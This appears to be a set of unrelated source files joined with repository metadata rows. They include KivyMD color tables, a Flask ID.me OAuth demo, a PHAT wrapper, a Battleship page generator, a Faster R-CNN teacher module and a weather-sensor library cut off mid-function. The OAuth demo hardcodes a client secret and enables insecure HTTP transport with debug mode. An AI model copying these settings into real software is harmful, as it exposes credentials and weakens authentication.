"300": "7986CB",
"400": "5C6BC0",
"500": "3F51B5",
"600": "3949AB",
"700": "303F9F",
"800": "283593",
"900": "1A237E",
"A100": "8C9EFF",
"A200": "536DFE",
"A400": "3D5AFE",
"A700": "304FFE",
},
"Blue": {
"50": "E3F2FD",
"100": "BBDEFB",
"200": "90CAF9",
"300": "64B5F6",
"400": "42A5F5",
"500": "2196F3",
"600": "1E88E5",
"700": "1976D2",
"800": "1565C0",
"900": "0D47A1",
"A100": "82B1FF",
"A200": "448AFF",
"A400": "2979FF",
"A700": "2962FF",
},
"LightBlue": {
"50": "E1F5FE",
"100": "B3E5FC",
"200": "81D4FA",
"300": "4FC3F7",
"400": "29B6F6",
"500": "03A9F4",
"600": "039BE5",
"700": "0288D1",
"800": "0277BD",
"900": "01579B",
"A100": "80D8FF",
"A200": "40C4FF",
"A400": "00B0FF",
"A700": "0091EA",
},
"Cyan": {
"50": "E0F7FA",
"100": "B2EBF2",
"200": "80DEEA",
"300": "4DD0E1",
"400": "26C6DA",
"500": "00BCD4",
"600": "00ACC1",
"700": "0097A7",
"800": "00838F",
"900": "006064",
"A100": "84FFFF",
"A200": "18FFFF",
"A400": "00E5FF",
"A700": "00B8D4",
},
"Teal": {
"50": "E0F2F1",
"100": "B2DFDB",
"200": "80CBC4",
"300": "4DB6AC",
"400": "26A69A",
"500": "009688",
"600": "00897B",
"700": "00796B",
"800": "00695C",
"900": "004D40",
"A100": "A7FFEB",
"A200": "64FFDA",
"A400": "1DE9B6",
"A700": "00BFA5",
},
"Green": {
"50": "E8F5E9",
"100": "C8E6C9",
"200": "A5D6A7",
"300": "81C784",
"400": "66BB6A",
"500": "4CAF50",
"600": "43A047",
"700": "388E3C",
"800": "2E7D32",
"900": "1B5E20",
"A100": "B9F6CA",
"A200": "69F0AE",
"A400": "00E676",
"A700": "00C853",
},
"LightGreen": {
"50": "F1F8E9",
"100": "DCEDC8",
"200": "C5E1A5",
"300": "AED581",
"400": "9CCC65",
"500": "8BC34A",
"600": "7CB342",
"700": "689F38",
"800": "558B2F",
"900": "33691E",
"A100": "CCFF90",
"A200": "B2FF59",
"A400": "76FF03",
"A700": "64DD17",
},
"Lime": {
"50": "F9FBE7",
"100": "F0F4C3",
"200": "E6EE9C",
"300": "DCE775",
"400": "D4E157",
"500": "CDDC39",
"600": "C0CA33",
"700": "AFB42B",
"800": "9E9D24",
"900": "827717",
"A100": "F4FF81",
"A200": "EEFF41",
"A400": "C6FF00",
"A700": "AEEA00",
},
"Yellow": {
"50": "FFFDE7",
"100": "FFF9C4",
"200": "FFF59D",
"300": "FFF176",
"400": "FFEE58",
"500": "FFEB3B",
"600": "FDD835",
"700": "FBC02D",
"800": "F9A825",
"900": "F57F17",
"A100": "FFFF8D",
"A200": "FFFF00",
"A400": "FFEA00",
"A700": "FFD600",
},
"Amber": {
"50": "FFF8E1",
"100": "FFECB3",
"200": "FFE082",
"300": "FFD54F",
"400": "FFCA28",
"500": "FFC107",
"600": "FFB300",
"700": "FFA000",
"800": "FF8F00",
"900": "FF6F00",
"A100": "FFE57F",
"A200": "FFD740",
"A400": "FFC400",
"A700": "FFAB00",
},
"Orange": {
"50": "FFF3E0",
"100": "FFE0B2",
"200": "FFCC80",
"300": "FFB74D",
"400": "FFA726",
"500": "FF9800",
"600": "FB8C00",
"700": "F57C00",
"800": "EF6C00",
"900": "E65100",
"A100": "FFD180",
"A200": "FFAB40",
"A400": "FF9100",
"A700": "FF6D00",
},
"DeepOrange": {
"50": "FBE9E7",
"100": "FFCCBC",
"200": "FFAB91",
"300": "FF8A65",
"400": "FF7043",
"500": "FF5722",
"600": "F4511E",
"700": "E64A19",
"800": "D84315",
"900": "BF360C",
"A100": "FF9E80",
"A200": "FF6E40",
"A400": "FF3D00",
"A700": "DD2C00",
},
"Brown": {
"50": "EFEBE9",
"100": "D7CCC8",
"200": "BCAAA4",
"300": "A1887F",
"400": "8D6E63",
"500": "795548",
"600": "6D4C41",
"700": "5D4037",
"800": "4E342E",
"900": "3E2723",
"A100": "000000",
"A200": "000000",
"A400": "000000",
"A700": "000000",
},
"Gray": {
"50": "FAFAFA",
"100": "F5F5F5",
"200": "EEEEEE",
"300": "E0E0E0",
"400": "BDBDBD",
"500": "9E9E9E",
"600": "757575",
"700": "616161",
"800": "424242",
"900": "212121",
"A100": "000000",
"A200": "000000",
"A400": "000000",
"A700": "000000",
},
"BlueGray": {
"50": "ECEFF1",
"100": "CFD8DC",
"200": "B0BEC5",
"300": "90A4AE",
"400": "78909C",
"500": "607D8B",
"600": "546E7A",
"700": "455A64",
"800": "37474F",
"900": "263238",
"A100": "000000",
"A200": "000000",
"A400": "000000",
"A700": "000000",
},
"Light": {
"StatusBar": "E0E0E0",
"AppBar": "F5F5F5",
"Background": "FAFAFA",
"CardsDialogs": "FFFFFF",
"FlatButtonDown": "cccccc",
},
"Dark": {
"StatusBar": "000000",
"AppBar": "1f1f1f",
"Background": "121212",
"CardsDialogs": "212121",
"FlatButtonDown": "999999",
},
}
"""Color palette. Taken from `2014 Material Design color palettes
<https://material.io/design/color/the-color-system.html>`_.
To demonstrate the shades of the palette, you can run the following code:
.. code-block:: python
from kivy.lang import Builder
from kivy.uix.boxlayout import BoxLayout
from kivy.utils import get_color_from_hex
from kivy.properties import ListProperty, StringProperty
from kivymd.color_definitions import colors
from kivymd.uix.tab import MDTabsBase
demo = '''
<Root@BoxLayout>
orientation: 'vertical'
MDToolbar:
title: app.title
MDTabs:
id: android_tabs
on_tab_switch: app.on_tab_switch(*args)
size_hint_y: None
height: "48dp"
tab_indicator_anim: False
ScrollView:
MDList:
id: box
<ItemColor>:
size_hint_y: None
height: "42dp"
canvas:
Color:
rgba: root.color
Rectangle:
size: self.size
pos: self.pos
MDLabel:
text: root.text
halign: "center"
<Tab>:
'''
from kivy.factory import Factory
from kivymd.app import MDApp
class Tab(BoxLayout, MDTabsBase):
pass
class ItemColor(BoxLayout):
text = StringProperty()
color = ListProperty()
class Palette(MDApp):
title = "Colors definitions"
def build(self):
Builder.load_string(demo)
self.screen = Factory.Root()
for name_tab in colors.keys():
tab = Tab(text=name_tab)
self.screen.ids.android_tabs.add_widget(tab)
return self.screen
def on_tab_switch(self, instance_tabs, instance_tab, instance_tabs_label, tab_text):
self.screen.ids.box.clear_widgets()
for value_color in colors[tab_text]:
self.screen.ids.box.add_widget(
ItemColor(
color=get_color_from_hex(colors[tab_text][value_color]),
text=value_color,
)
)
def on_start(self):
self.on_tab_switch(
None,
None,
None,
self.screen.ids.android_tabs.ids.layout.children[-1].text,
)
Palette().run()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/palette.gif
:align: center
"""
palette = [
"Red",
"Pink",
"Purple",
"DeepPurple",
"Indigo",
"Blue",
"LightBlue",
"Cyan",
"Teal",
"Green",
"LightGreen",
"Lime",
"Yellow",
"Amber",
"Orange",
"DeepOrange",
"Brown",
"Gray",
"BlueGray",
]
"""Valid values for color palette selecting."""
hue = [
"50",
"100",
"200",
"300",
"400",
"500",
"600",
"700",
"800",
"900",
"A100",
"A200",
"A400",
"A700",
]
"""Valid values for color hue selecting."""
light_colors = {
"Red": ["50", "100", "200", "300", "A100"],
"Pink": ["50", "100", "200", "A100"],
"Purple": ["50", "100", "200", "A100"],
"DeepPurple": ["50", "100", "200", "A100"],
"Indigo": ["50", "100", "200", "A100"],
"Blue": ["50", "100", "200", "300", "400", "A100"],
"LightBlue": [
"50",
"100",
"200",
"300",
"400",
"500",
"A100",
"A200",
"A400",
],
"Cyan": [
"50",
"100",
"200",
"300",
"400",
"500",
"600",
"A100",
"A200",
"A400",
"A700",
],
"Teal": ["50", "100", "200", "300", "400", "A100", "A200", "A400", "A700"],
"Green": [
"50",
"100",
"200",
"300",
"400",
"500",
"A100",
"A200",
"A400",
"A700",
],
"LightGreen": [
"50",
"100",
"200",
"300",
"400",
"500",
"600",
"A100",
"A200",
"A400",
"A700",
],
"Lime": [
"50",
"100",
"200",
"300",
"400",
"500",
"600",
"700",
"800",
"A100",
"A200",
"A400",
"A700",
],
"Yellow": [
"50",
"100",
"200",
"300",
"400",
"500",
"600",
"700",
"800",
"900",
"A100",
"A200",
"A400",
"A700",
],
"Amber": [
"50",
"100",
"200",
"300",
"400",
"500",
"600",
"700",
"800",
"900",
"A100",
"A200",
"A400",
"A700",
],
"Orange": [
"50",
"100",
"200",
"300",
"400",
"500",
"600",
"700",
"A100",
"A200",
"A400",
"A700",
],
"DeepOrange": ["50", "100", "200", "300", "400", "A100", "A200"],
"Brown": ["50", "100", "200"],
"Gray": ["51", "100", "200", "300", "400", "500"],
"BlueGray": ["50", "100", "200", "300"],
"Dark": [],
"Light": ["White", "MainBackground", "DialogBackground"],
}
"""Which colors are light. Other are dark."""
text_colors = {
"Red": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "000000",
"400": "FFFFFF",
"500": "FFFFFF",
"600": "FFFFFF",
"700": "FFFFFF",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "000000",
"A200": "FFFFFF",
"A400": "FFFFFF",
"A700": "FFFFFF",
},
"Pink": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "FFFFFF",
"400": "FFFFFF",
"500": "FFFFFF",
"600": "FFFFFF",
"700": "FFFFFF",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "000000",
"A200": "FFFFFF",
"A400": "FFFFFF",
"A700": "FFFFFF",
},
"Purple": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "FFFFFF",
"400": "FFFFFF",
"500": "FFFFFF",
"600": "FFFFFF",
"700": "FFFFFF",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "000000",
"A200": "FFFFFF",
"A400": "FFFFFF",
"A700": "FFFFFF",
},
"DeepPurple": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "FFFFFF",
"400": "FFFFFF",
"500": "FFFFFF",
"600": "FFFFFF",
"700": "FFFFFF",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "000000",
"A200": "FFFFFF",
"A400": "FFFFFF",
"A700": "FFFFFF",
},
"Indigo": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "FFFFFF",
"400": "FFFFFF",
"500": "FFFFFF",
"600": "FFFFFF",
"700": "FFFFFF",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "000000",
"A200": "FFFFFF",
"A400": "FFFFFF",
"A700": "FFFFFF",
},
"Blue": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "000000",
"400": "000000",
"500": "FFFFFF",
"600": "FFFFFF",
"700": "FFFFFF",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "000000",
"A200": "FFFFFF",
"A400": "FFFFFF",
"A700": "FFFFFF",
},
"LightBlue": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "000000",
"400": "000000",
"500": "000000",
"600": "FFFFFF",
"700": "FFFFFF",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "000000",
"A200": "000000",
"A400": "000000",
"A700": "FFFFFF",
},
"Cyan": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "000000",
"400": "000000",
"500": "000000",
"600": "000000",
"700": "FFFFFF",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "000000",
"A200": "000000",
"A400": "000000",
"A700": "000000",
},
"Teal": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "000000",
"400": "000000",
"500": "FFFFFF",
"600": "FFFFFF",
"700": "FFFFFF",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "000000",
"A200": "000000",
"A400": "000000",
"A700": "000000",
},
"Green": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "000000",
"400": "000000",
"500": "000000",
"600": "FFFFFF",
"700": "FFFFFF",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "000000",
"A200": "000000",
"A400": "000000",
"A700": "000000",
},
"LightGreen": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "000000",
"400": "000000",
"500": "000000",
"600": "000000",
"700": "FFFFFF",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "000000",
"A200": "000000",
"A400": "000000",
"A700": "000000",
},
"Lime": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "000000",
"400": "000000",
"500": "000000",
"600": "000000",
"700": "000000",
"800": "000000",
"900": "FFFFFF",
"A100": "000000",
"A200": "000000",
"A400": "000000",
"A700": "000000",
},
"Yellow": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "000000",
"400": "000000",
"500": "000000",
"600": "000000",
"700": "000000",
"800": "000000",
"900": "000000",
"A100": "000000",
"A200": "000000",
"A400": "000000",
"A700": "000000",
},
"Amber": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "000000",
"400": "000000",
"500": "000000",
"600": "000000",
"700": "000000",
"800": "000000",
"900": "000000",
"A100": "000000",
"A200": "000000",
"A400": "000000",
"A700": "000000",
},
"Orange": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "000000",
"400": "000000",
"500": "000000",
"600": "000000",
"700": "000000",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "000000",
"A200": "000000",
"A400": "000000",
"A700": "000000",
},
"DeepOrange": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "000000",
"400": "000000",
"500": "FFFFFF",
"600": "FFFFFF",
"700": "FFFFFF",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "000000",
"A200": "000000",
"A400": "FFFFFF",
"A700": "FFFFFF",
},
"Brown": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "FFFFFF",
"400": "FFFFFF",
"500": "FFFFFF",
"600": "FFFFFF",
"700": "FFFFFF",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "FFFFFF",
"A200": "FFFFFF",
"A400": "FFFFFF",
"A700": "FFFFFF",
},
"Gray": {
"50": "FFFFFF",
"100": "000000",
"200": "000000",
"300": "000000",
"400": "000000",
"500": "000000",
"600": "FFFFFF",
"700": "FFFFFF",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "FFFFFF",
"A200": "FFFFFF",
"A400": "FFFFFF",
"A700": "FFFFFF",
},
"BlueGray": {
"50": "000000",
"100": "000000",
"200": "000000",
"300": "000000",
"400": "FFFFFF",
"500": "FFFFFF",
"600": "FFFFFF",
"700": "FFFFFF",
"800": "FFFFFF",
"900": "FFFFFF",
"A100": "FFFFFF",
"A200": "FFFFFF",
"A400": "FFFFFF",
"A700": "FFFFFF",
},
}
"""Text colors generated from :data:`~light_colors`. "000000" for light and
"FFFFFF" for dark.
How to generate text_colors dict
.. code-block:: python
text_colors = {}
for p in palette:
text_colors[p] = {}
for h in hue:
if h in light_colors[p]:
text_colors[p][h] = "000000"
else:
text_colors[p][h] = "FFFFFF"
"""
theme_colors = [
"Primary",
"Secondary",
"Background",
"Surface",
"Error",
"On_Primary",
"On_Secondary",
"On_Background",
"On_Surface",
"On_Error",
]
"""Valid theme colors."""
| 22.448677 | 101 | 0.392995 |
8b9abb84b395bb95bd654e839b1d398e3d3a6b31 | 1,697 | py | Python | server.py | namitkumar14/PythonSampler | 1c8545b38560c59ae4eb5651fab4f018d88570ed | [
"MIT"
] | null | null | null | server.py | namitkumar14/PythonSampler | 1c8545b38560c59ae4eb5651fab4f018d88570ed | [
"MIT"
] | null | null | null | server.py | namitkumar14/PythonSampler | 1c8545b38560c59ae4eb5651fab4f018d88570ed | [
"MIT"
] | null | null | null | import os
from flask import Flask, jsonify, render_template, request, redirect, session, url_for
from requests_oauthlib import OAuth2Session
app = Flask(__name__)
# Get this information by registering your app at https://developer.id.me
client_id = '910213c3a884ff8780ae8b40d95ff687'
client_secret = 'ce922c92c0cd99fbfb68eaa29b237f85'
redirect_uri = 'http://id.me'
authorization_base_url = 'https://api.id.me/oauth/authorize'
token_url = 'https://api.id.me/oauth/token'
attributes_url = 'https://api.id.me/api/public/v3/attributes.json'
scope = ['military']
@app.route("/")
def demo():
return render_template('index.html')
@app.route("/callback", methods=["GET"])
def callback():
# Exchange your code for an access token
idme = OAuth2Session(client_id, redirect_uri=redirect_uri)
token = idme.fetch_token(token_url, client_secret=client_secret, authorization_response=request.url)
# At this point you can fetch a user's attributes but lets save
# the token and show how this is done from a persisted token
# in /profile.
session['oauth_token'] = token
return redirect(url_for('.profile'))
@app.route("/profile", methods=["GET"])
def profile():
# Fetching the user's attributes using an OAuth 2 token.
idme = OAuth2Session(client_id, token=session['oauth_token'])
payload = idme.get(attributes_url).json()
session['profile'] = 'true'
return jsonify(payload)
if __name__ == "__main__":
# This allows us to use a plain HTTP callback
os.environ['DEBUG'] = "1"
os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'
app.secret_key = os.urandom(24)
app.run(debug=True)
| 33.94 | 104 | 0.701827 |
a4ed8757612ce8d0da023b344c0c06a870ad1846 | 2,224 | py | Python | dmt/phat_wrap.py | arksch/fuzzy-eureka | b3511abcef5cdc6cd4d28253d9e69f5ad1a862ec | [
"MIT"
] | null | null | null | dmt/phat_wrap.py | arksch/fuzzy-eureka | b3511abcef5cdc6cd4d28253d9e69f5ad1a862ec | [
"MIT"
] | null | null | null | dmt/phat_wrap.py | arksch/fuzzy-eureka | b3511abcef5cdc6cd4d28253d9e69f5ad1a862ec | [
"MIT"
] | null | null | null | """ Wrapping PHAT """
import numpy as np
import phat
def persistence_diagram(boundary_matrix_csc, dimensions, filtration):
""" Compute persistence diagram from a sparse matrix
:param boundary_matrix_csc: Sparse matrix
:param dimensions: Cell dimensions
:param filtration: Filtration
:returns: Persistence diagrams
"""
sort_order = np.lexsort((dimensions, filtration)) # Last key has higher sort priority
boundary_matrix_csc = boundary_matrix_csc[sort_order, :][:, sort_order]
dimensions = dimensions[sort_order]
filtration = filtration[sort_order]
col_count = boundary_matrix_csc.shape[1]
assert len(dimensions) == col_count
columns = [boundary_matrix_csc.getcol(col).indices.tolist() for col in range(col_count)]
# Many representations (vector_vector, full_pivot_column, bit_tree_pivot_column)
# of PHAT seem to work incorrectly. vector_heap is ok.
bdry = phat.boundary_matrix(representation=phat.representations.vector_heap,
columns=list(zip(dimensions, columns)))
pairs = bdry.compute_persistence_pairs(reduction=phat.reductions.twist_reduction)
dgms = pairs_to_diagram(pairs, dimensions, filtration)
return dgms
def pairs_to_diagram(pairs, dimensions, filtration):
""" Parse PHAT pairs into persistence diagram """
pairs = np.array(pairs, dtype=int).reshape(-1, 2) # Empty arrays have two columns
pairs = add_infinite_pairs(pairs, size=len(filtration))
return {dim: pairs_to_filtr_diag(pairs_in_dimension(pairs, dimensions, dim), filtration)
for dim in range(max(dimensions) + 1)}
def add_infinite_pairs(pairs, size):
""" Helper """
infinite_births = np.setdiff1d(np.arange(size, dtype=int), pairs)
infinite_pairs = np.column_stack([infinite_births, np.full(len(infinite_births), -1)])
return np.concatenate([pairs, infinite_pairs])
def pairs_in_dimension(pairs, dimensions, dim):
""" Helper """
ixs = np.where(dimensions == dim)[0]
return pairs[np.isin(pairs[:, 0], ixs)]
def pairs_to_filtr_diag(pairs, filtration):
""" Helper """
filtration_with_inf = np.append(filtration, np.inf)
return filtration_with_inf[pairs.astype(int)]
| 39.714286 | 92 | 0.722572 |
87f7cc70def08e11f6405a30b6d37e5706600bcf | 1,769 | py | Python | napisi_tabelo_naprej.py | klarakresnik/Potapljanje-ladjic | 0ffec3a3ba7f20cfa8851d7b30c7d85eb335ab98 | [
"MIT"
] | null | null | null | napisi_tabelo_naprej.py | klarakresnik/Potapljanje-ladjic | 0ffec3a3ba7f20cfa8851d7b30c7d85eb335ab98 | [
"MIT"
] | null | null | null | napisi_tabelo_naprej.py | klarakresnik/Potapljanje-ladjic | 0ffec3a3ba7f20cfa8851d7b30c7d85eb335ab98 | [
"MIT"
] | null | null | null | import model
def napisi_tabelo_naprej(datoteka, morje, velikost, st):
vsebina = ''
with open(datoteka, 'w', encoding='utf-8') as dat:
dat.write("%rebase('base_za_sestavljanje_ladjic" + str(velikost) + ".tpl')\n")
dat.write('Izberi si nadaljne kvadratke tvoje ladjice.\n')
if st == 0:
dat.write('<form action="/oblikovanje_mape/ladja/" method="post">\n')
if st == 1:
dat.write('<form action="/oblikovanje_mape/ladja_prvi/" method="post">\n')
if st == 2:
dat.write('<form action="/oblikovanje_mape/ladja_drugi/" method="post">\n')
dat.write('<div style="margin:20px">\n<table>\n')
for x in range(velikost ** 2):
stanje = morje.mapa[x]
ime = str(x)
if x in morje.predlagaj_okolico_ladje(morje.trenutna_ladja):
vsebina = '<button class="velikost_gumba" style="background-color:#3394b5;" name="ladja" type="submit" value="' + ime + '"></button>'
else:
if stanje == model.MORJE:
vsebina = '<button class="velikost_gumba" style="background-color:##4bafd1;" type="button" disabled></button>'
if stanje == model.LADJA:
vsebina = '<button class="velikost_gumba" style="background-color:#e1e3e1" type="button" disabled><i class="material-icons" style="color:black;">directions_boat</i></button>'
if x % velikost == 0:
dat.write('<tr>\n')
dat.write('<td>')
dat.write(vsebina)
dat.write('</td>\n')
if (x + 1) % velikost == 0:
dat.write('</tr>\n')
dat.write('</div>\n</table>\n</div>\n</form>\n') | 55.28125 | 214 | 0.542114 |
f97869c1c0a6a109415f72eb29da80ccd440da50 | 5,404 | py | Python | lib/model/faster_rcnn/faster_rcnn_teacher.py | heekhero/MTOR | e0dbc22bb7f4bc864ed7a7d43ffeb22671d8fd40 | [
"MIT"
] | 3 | 2020-05-01T08:46:55.000Z | 2022-03-10T11:07:12.000Z | lib/model/faster_rcnn/faster_rcnn_teacher.py | heekhero/MTOR | e0dbc22bb7f4bc864ed7a7d43ffeb22671d8fd40 | [
"MIT"
] | null | null | null | lib/model/faster_rcnn/faster_rcnn_teacher.py | heekhero/MTOR | e0dbc22bb7f4bc864ed7a7d43ffeb22671d8fd40 | [
"MIT"
] | null | null | null | import random
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import torchvision.models as models
from torch.autograd import Variable
import numpy as np
from model.utils.config import cfg
from model.rpn.rpn import _RPN
from torchvision.ops import RoIPool
from torchvision.ops import RoIAlign
from model.rpn.proposal_target_layer_cascade import _ProposalTargetLayer
import time
import pdb
import torch.nn.init as init
from model.utils.net_utils import _smooth_l1_loss, _crop_pool_layer, _affine_grid_gen, _affine_theta
from torchvision.ops import nms
class _fasterRCNN(nn.Module):
""" faster RCNN """
def __init__(self, classes, class_agnostic):
super(_fasterRCNN, self).__init__()
self.classes = classes
self.n_classes = len(classes)
self.class_agnostic = class_agnostic
# loss
self.RCNN_loss_cls = 0
self.RCNN_loss_bbox = 0
# define rpn
self.RCNN_rpn = _RPN(self.dout_base_model)
self.RCNN_proposal_target = _ProposalTargetLayer(self.n_classes)
self.RCNN_roi_align = RoIAlign(output_size=(cfg.POOLING_SIZE, cfg.POOLING_SIZE), spatial_scale=1.0 / 16.0,
sampling_ratio=2)
self.RCNN_roi_pool = RoIPool((cfg.POOLING_SIZE, cfg.POOLING_SIZE), 1.0 / 16.0)
self.grid_size = cfg.POOLING_SIZE * 2 if cfg.CROP_RESIZE_WITH_MAX_POOL else cfg.POOLING_SIZE
def forward(self, im_data, im_info, gt_boxes, num_boxes):
batch_size = im_data.size(0)
base_feat = self.RCNN_base(im_data)
rois, rpn_loss_cls, rpn_loss_bbox = self.RCNN_rpn(base_feat, im_info, gt_boxes, num_boxes)
rois = Variable(rois)
if cfg.POOLING_MODE == 'crop':
grid_xy = _affine_grid_gen(rois.view(-1, 5), base_feat.size()[2:], self.grid_size)
grid_yx = torch.stack([grid_xy.data[:,:,:,1], grid_xy.data[:,:,:,0]], 3).contiguous()
pooled_feat = self.RCNN_roi_crop(base_feat, Variable(grid_yx).detach())
if cfg.CROP_RESIZE_WITH_MAX_POOL:
pooled_feat = F.max_pool2d(pooled_feat, 2, 2)
elif cfg.POOLING_MODE == 'align':
pooled_feat = self.RCNN_roi_align(base_feat, rois.view(-1, 5))
elif cfg.POOLING_MODE == 'pool':
pooled_feat = self.RCNN_roi_pool(base_feat, rois.view(-1,5))
pooled_feat_post = self._head_to_tail(pooled_feat)
bbox_pred = self.RCNN_bbox_pred(pooled_feat_post)
cls_score = self.RCNN_cls_score(pooled_feat_post)
cls_prob = F.softmax(cls_score, 1)
cls_prob = cls_prob.view(batch_size, rois.size(1), -1)
bbox_pred = bbox_pred.view(batch_size, rois.size(1), -1)
post_inds = self.rois_filter(cls_prob, cfg.TRAIN.TEACHER_ROI_THRESHOLD)
if len(post_inds) > 100:
# print(len(post_inds))
post_inds = post_inds[torch.randperm(len(post_inds))[:100]]
post_rois = rois[:, post_inds, :]
post_cls_prob = cls_prob[:, post_inds, :]
pooled_feat_post = pooled_feat_post[post_inds, :]
# max_fg_prob, max_fg_inds = torch.max(post_cls_prob[0], dim=1)
#
# res_rois = None
# res_cls_prob = None
# res_feat = None
# for cls_ind in range(1, post_cls_prob.size(2)):
# each_cls_inds = torch.nonzero((max_fg_inds==cls_ind).view(-1)).view(-1)
# each_max_fg_prob = max_fg_prob[each_cls_inds]
# keep = nms(post_rois[0, each_cls_inds, 1:], each_max_fg_prob, 0.7)
# if res_rois is None:
# res_rois = post_rois[:, keep, :]
# res_cls_prob = post_cls_prob[:, keep, :]
# res_feat = pooled_feat_post[keep, :]
# else:
# res_rois = torch.cat([res_rois, post_rois[:, keep, :]], dim=1)
# res_cls_prob = torch.cat([res_cls_prob, post_cls_prob[:, keep, :]], dim=1)
# res_fea = torch.cat([res_feat, pooled_feat_post[keep, :]], dim=0)
if self.training:
return post_rois, pooled_feat_post, post_cls_prob
else:
return rois, cls_prob, bbox_pred
def _init_weights(self):
def normal_init(m, mean, stddev, truncated=False):
"""
weight initalizer: truncated normal and random normal.
"""
# x is a parameter
if truncated:
m.weight.data.normal_().fmod_(2).mul_(stddev).add_(mean) # not a perfect approximation
else:
m.weight.data.normal_(mean, stddev)
m.bias.data.zero_()
normal_init(self.RCNN_rpn.RPN_Conv, 0, 0.01, cfg.TRAIN.TRUNCATED)
normal_init(self.RCNN_rpn.RPN_cls_score, 0, 0.01, cfg.TRAIN.TRUNCATED)
normal_init(self.RCNN_rpn.RPN_bbox_pred, 0, 0.01, cfg.TRAIN.TRUNCATED)
normal_init(self.RCNN_cls_score, 0, 0.01, cfg.TRAIN.TRUNCATED)
normal_init(self.RCNN_bbox_pred, 0, 0.001, cfg.TRAIN.TRUNCATED)
def create_architecture(self):
self._init_modules()
self._init_weights()
def rois_filter(self, cls_prob, threshold):
max_prob, arg_max = torch.max(cls_prob.squeeze(0), dim=1)
fg_inds = torch.nonzero((arg_max!=0).view(-1)).view(-1)
max_prob = max_prob[fg_inds]
return fg_inds[torch.nonzero((max_prob > threshold).view(-1)).view(-1)]
| 41.569231 | 114 | 0.642857 |
2b7908bc69d412c34b9ffe0e592a1e1221b2d9d4 | 63 | py | Python | script_generators/process_test.py | westernmarslab/tanager-feeder | 59bc4d5deca474e2c915ea49aaba791f247de41f | [
"MIT"
] | null | null | null | script_generators/process_test.py | westernmarslab/tanager-feeder | 59bc4d5deca474e2c915ea49aaba791f247de41f | [
"MIT"
] | null | null | null | script_generators/process_test.py | westernmarslab/tanager-feeder | 59bc4d5deca474e2c915ea49aaba791f247de41f | [
"MIT"
] | 1 | 2021-04-23T00:03:46.000Z | 2021-04-23T00:03:46.000Z | for i in range(30):
print("process(")
print("sleep(5)") | 21 | 21 | 0.571429 |
ecd8ff242f98596fde6c75bab2dcebf7bbe750dd | 10,517 | py | Python | SDL_Pi_WeatherRack/SDL_Pi_WeatherRack.py | zerosquadron/grove-weather-pi | 05cab7836f831546cbb2a7cd2a260e2fe15de62b | [
"MIT"
] | 1 | 2019-03-19T06:59:45.000Z | 2019-03-19T06:59:45.000Z | SDL_Pi_WeatherRack/SDL_Pi_WeatherRack.py | zerosquadron/grove-weather-pi | 05cab7836f831546cbb2a7cd2a260e2fe15de62b | [
"MIT"
] | null | null | null | SDL_Pi_WeatherRack/SDL_Pi_WeatherRack.py | zerosquadron/grove-weather-pi | 05cab7836f831546cbb2a7cd2a260e2fe15de62b | [
"MIT"
] | null | null | null | #
#
#
# SDL_Pi_WeatherRack.py - Raspberry Pi Python Library for SwitchDoc Labs WeatherRack.
#
# SparkFun Weather Station Meters
# Argent Data Systems
# Created by SwitchDoc Labs February 13, 2015
# Released into the public domain.
# Version 1.3 - remove 300ms Bounce
# Version 2.0 - Update for WeatherPiArduino V2
# Version 3.0 - Removed Double Interrupts
#
# imports
try:
# Check for user imports
try:
import conflocal as config
except ImportError:
import config
except:
import NoWPAConfig as config
import sys
import time as time_
sys.path.append('./SDL_Adafruit_ADS1x15')
from SDL_Adafruit_ADS1x15 import ADS1x15
import RPi.GPIO as GPIO
GPIO.setwarnings(False)
from datetime import *
# constants
SDL_MODE_INTERNAL_AD = 0
SDL_MODE_I2C_ADS1015 = 1
#sample mode means return immediately. THe wind speed is averaged at sampleTime or when you ask, whichever is longer
SDL_MODE_SAMPLE = 0
#Delay mode means to wait for sampleTime and the average after that time.
SDL_MODE_DELAY = 1
# Number of Interupts per Rain Bucket and Anemometer Clicks
SDL_INTERRUPT_CLICKS = 1
SDL_RAIN_BUCKET_CLICKS = 2
WIND_FACTOR = 2.400 / SDL_INTERRUPT_CLICKS
# Helper Functions
def fuzzyCompare(compareValue, value):
VARYVALUE = 0.05
if ( (value > (compareValue * (1.0-VARYVALUE))) and (value < (compareValue *(1.0+VARYVALUE))) ):
return True
return False
def voltageToDegrees(value, defaultWindDirection):
# Note: The original documentation for the wind vane says 16 positions. Typically only recieve 8 positions. And 315 degrees was wrong.
# For 5V, use 1.0. For 3.3V use 0.66
ADJUST3OR5 = 1.0
PowerVoltage = 5.0
if (fuzzyCompare(3.84 * ADJUST3OR5, value)):
return 0.0
